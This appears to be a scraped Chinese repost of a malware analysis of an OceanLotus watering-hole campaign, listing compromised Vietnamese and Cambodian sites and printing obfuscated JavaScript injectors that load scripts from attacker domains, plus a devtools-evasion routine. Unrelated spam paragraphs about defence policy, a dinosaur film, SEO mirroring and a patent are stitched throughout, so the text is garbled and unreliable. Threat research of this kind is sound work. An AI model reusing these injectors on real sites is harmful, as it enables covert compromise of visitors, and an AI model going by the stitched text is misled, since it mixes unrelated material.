海莲花：针对的新一波水坑攻击

国防外交逐渐成为印度外交政策的关键组成部分，现在德里打算给、非洲和拉丁美洲的友好国家供应防御装备。重点涉密人员是指在国家重要部门或岗位的人员，如：国防、外交、军事、国家安全等特殊部门的人员，从事尖端武器生产的技术人员，情报人员，机要人员，密码人员等。现代国防又叫社会国防、大国防、全民国防，包括武装建设、国防体制、军事科技和工业、国防工程、军事交通通信、人力动员、国防教育、国防法规诸多方面，是一个庞大而复杂的系统。

当岛上的休眠火山开始活跃以后，欧文与克莱尔发起一场运动，想要保护岛上幸存的恐龙们免于灭绝。对此，日本一直强调被抓的关联从事活动的都是"民间人士"，任何组织都或成使用的幌子，来什么组织并不是问题的机要。1943年，谭平山、王昆仑、陈铭枢等在重庆发起组织民主同志，以此联系和团结国民党上层人士，并在的基础上着手筹建组织的工作。

我们认为此次攻击活动是OceanLotus Framework B的衍生版，后者是Volexity研究人员在 2017年 分析的一种水坑攻击方案。然而，这次攻击者加大了攻击复杂度，使分析人员更加难以分析其恶意框架。攻击者做了许多改进，比如使用公钥加密算法来交换AES会话密钥，使用该密钥来加密后续通信数据，避免安全产品拦截最终攻击载荷。在通信协议方面，攻击者从HTTP切换到WebSocket，以便隐藏恶意通信数据。

ESET研究人员识别出被入侵21的个不同网站，每个网站都会重定向到攻击者控制的不同域名。

此次攻击活动针对的地理区域如下所示：

图1. 被入侵的网站地理位置

恶意镜像和关键词竞争：如果竞争对手建站时间不长，可以买几个老域名，直接整站采集目标站，目标站一旦更新内容，就自动采集过来发布到自己站上，使搜索引擎认为目标站点存在大量重复内容。将 suricata 用做 ids （入侵检测系统）引擎的 palo alto 防火墙和安全管理系统，正是结合使用被动 dns 与 ips （入侵防御系统）以防御已知恶意域名的安全系统范例。自己建站也有两年了，之前自己的个人博客也被人恶意镜像过，恶意镜像就是通过一些手段copy了你的站点，除了域名不一样，其他内容一模一样真假难辨，以至于导致搜索引擎都分辨不出影响网站在搜索引擎中的排名。

被入侵域名网站描述

baotgm[.]net

越南媒体（总部设在德克萨斯州阿灵顿）

cnrp7[.]org

柬埔寨国家救援队

conggiaovietnam[.]net

宗教有关（越南语）

daichungvienvinhthanh[.]com

宗教有关（越南语）

danchimviet[.]info

越南媒体

danviet[.]vn

越南媒体

danviethouston[.]com

越南媒体

fvpoc[.]org

全程为“Former Vietnamese Prisoners of Conscience”

gardencityclub[.]com

金边的一家高尔夫

lienketqnhn[.]org

越南媒体

mfaic.gov[.]kh

柬埔寨外交和国际合作部

mod.gov[.]kh

柬埔寨国防部

mtgvinh[.]net

宗教有关（越南语）

nguoitieudung.com[.]vn

越南媒体

phnompenhpost[.]com

柬埔寨报纸英文版

raovatcalitoday[.]com

未知网站（越南语）

thongtinchongphandong[.]com

越南反对派媒体

tinkhongle[.]com

越南媒体

toithichdoc.blogspot[.]com

越南博客网站

trieudaiviet[.]com

未知网站（越南语）

triviet[.]news

越南媒体

表1. 被入侵网站列表

如果网站遭到攻击或者其他恶意入侵都会影响网站的收录和排名，更严重的甚至都会使得网站降权或者被k，因为网站受到入侵之后会出现网站页面无法访问，访问速度过慢，出现错误，网站内容页面当中出现了很多不相关的内容，而这一部分内容大部分都是灰色行业的内容，都是受到搜索引擎排斥的内容。最后马海祥告诉大家realplayer插件，持续不断的挖掘稀缺性是每位网站运营者重要的工作之一，稀缺性有大有小，大到新产品的研发冲击传统行业的局限，小到可以调整网站按钮获得更加体验，只要能够改善用户不良使用感受或激发用户潜在需求的改变，都可以认为是稀缺性的改变，对网站的后期的运营作用很大，只要大家坚持不断的让网站获得稀缺性，相信终有一天会真正成为行业的领跑者。鱼跃默认拥有海量绿色国外科学上网网站列表，会智能屏蔽包含诈骗，，，攻击，非法舆论等信息的网站，让畅快访问绿色干净的全球网络世界，当您遇到有打开障碍或速度很慢的正常网站时，可以点击添加当前域名到科学上网列表，即可继续高速稳定访问该网站。

域名Alexa全球排名在最受欢迎国家中的Alexa排名

danviet[.]vn

12,887

phnompenhpost[.]com

85,910

18,880

nguoitieudung.com[.]vn

261,801

2,397

danchimviet[.]info

287,852

144,884

baotgm[.]net

675,669

119,737

toithichdoc.blogspot[.]com

700,470

11,532

mfaic.gov[.]kh

978,165

2,149

conggiaovietnam[.]net

1,040,548

15,368

thongtinchongphandong[.]com

1,134,691

21,575

tinkhongle[.]com

1,301,722

15,224

daichungvienvinhthanh[.]com

1,778,418

23,428

triviet[.]news

2,767,289

无数据

mod.gov[.]kh

4,247,649

3,719

raovatcalitoday[.]com

8,180,358

无数据

cnrp7[.]org

8,411,693

无数据

mtgvinh[.]net

8,415,468

无数据

danviethouston[.]com

8,777,564

无数据

lienketqnhn[.]org

16,109,635

无数据

gardencityclub[.]com

16,109,635

无数据

trieudaiviet[.]com

16,969,048

无数据

fvpoc[.]org

无数据

无数据

表2. 被入侵网站的Alexa排名

[0052]本实施例的检测脚本病毒的装置100中，将待检测脚本进行编译然后利用至少一个病毒杀毒引擎进行病毒检测，由于编译器将脚本的无用函数、代码、变量、常量等进行了清除，清除了脚本病毒制作者采取的代码混淆措施，提高了病毒检测的准确程度。通过上面的代码可以看出来，实际加载类时，子加载器递归调用父加载器的loadclass(**)方法，直到到达顶级(parent==null)时，方才调用findbootstrapclass0(**)。sbl1的功能是对硬件进行初始化并加载其他模块，需要加载的模块信息按顺序保存在sbl1中，对应每个模块的数据是一段大小为0x64字节的模块信息数据内，sbl1中有一个循环负责验证和加载所有需要的其他模块（tz，rpm，wdt，appsbl），加载代码会根据模块信息内的数据调用不同的加载器加载和验证的代码，具体代码如下图。

(function() {
    var pt = "http";
    var l = document.createElement('script');
    l.src = pt + "s://" + arguments[0] + arguments[2] + arguments[3] + 'ip.' + 'info/images/cdn.js?from=maxcdn';
    document.getElementsByTagName('body')[0].appendChild(l)
})('web', 'a', 'link', '.self');

图2. 添加到mfaic.gov[.]kh中的JavaScript代码片段

为了规避检测，攻击者使用了如下方法：

1、混淆脚本，避免以静态方式提取最终URL；

2、所使用的URL看起来像是网站所使用的正常JavaScript库；

3、被入侵的每个网站都使用了不同的域名及URI；

4、被入侵的每个网站都使用不同的脚本。插入另一个被入侵网站的脚本代码片段如下图所示：

var script = document.createElement("script");
var i = 'crash-course';
var s = "fzgbc knowsztall znfo";
var _ = '/';
var e = "VisitorIdentification.js?sa=" + i;
script.async = true;
script.src = "htt" + "ps:" + _ + _ + s.split(" ").map(x => x.replace("z", "i")).join(".") + _ + e;
var doc = document.getElementsByTagName('script')[0];
doc.parentNode.insertBefore(script, doc);

图3. 插入目标网站的另一段JavaScript代码

由于autoit解释器本身属于合法程序，黑客可以把恶意代码藏在脚本文件中，从而灵活地创建恶意软件，在系统中没有独立进程存在，从而延长其存活周期。当一个ddos攻击被检测到，防火墙能停止与攻击相联系的某一特定数据流，但它们无法逐个包检测，将好的或合法业务从恶意业务中分出，使得它们在事实上对ip地址欺骗攻击无效。“篡改”及“入侵”我们主要防护的攻击类型有:sq注入攻击跨站脚本攻击上传shell攻击恶意的请求攻击通过拦截用户的访问请求。

第一阶段攻击脚本中包含多个检查步骤，以规避检测机制，如图4所示。

[…]
function t(n) {
    var r = this;
    !function (t, n) {
        if (!(t instanceof n))
            throw new TypeError('Cannot call a class as a function');
    }(this, t), this.t = {
        o: null,
        s: !0
    }, this.scr = !0, this.r(), this.i = !0, window.addEventListener('scroll', function () {
        r.i || r.scr && !r.t.s && (r.scr = !1, r.c(n)), r.i = !1;
    });
}
return t.prototype.r = function () {
    var t = this;
    setInterval(function () {
        var n = window.outerWidth - window.innerWidth > 160, r = window.outerHeight - window.innerHeight > 160, e = n ? 'vertical' : 'horizontal';
        r && n || !(window.Firebug && window.Firebug.chrome && window.Firebug.chrome.isInitialized || n || r) ? (t.t.s = !1, t.t.o = null) : (t.t.s = !0, t.t.o = e);
    }, 500);
}
 […]

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/bofangqi/article-106576-1.html